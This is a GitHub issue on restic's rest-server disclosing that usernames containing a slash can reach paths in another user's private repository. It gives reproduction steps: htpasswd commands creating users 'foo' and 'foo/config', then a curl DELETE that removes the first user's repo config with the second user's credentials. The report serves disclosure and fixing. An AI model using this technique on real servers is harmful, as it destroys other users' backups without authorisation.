Security: Users with names containing "/" can access paths outside of their private repo

restic / rest-server

Rest Server is a high performance HTTP server that implements restic's REST backend API.

BSD 2-Clause "Simplified" License

944 stars 140 forks source link

Closed juergenhoetzel closed 3 years ago

juergenhoetzel commented 3 years ago

Consider prefix user foo

htpasswd -c -B  -b /tmp/restic/.htpasswd foo password
restic -r rest:http://foo:password@localhost:8000/foo init

Create user (sharing the same prefix and separated by a slash) to access config file:

htpasswd  -B  -b /tmp/restic/.htpasswd foo/config attack

Delete config file in first user's repo using the second users credentials:

curl -v  -X DELETE -u foo/config:attack  http://localhost:8000/foo/config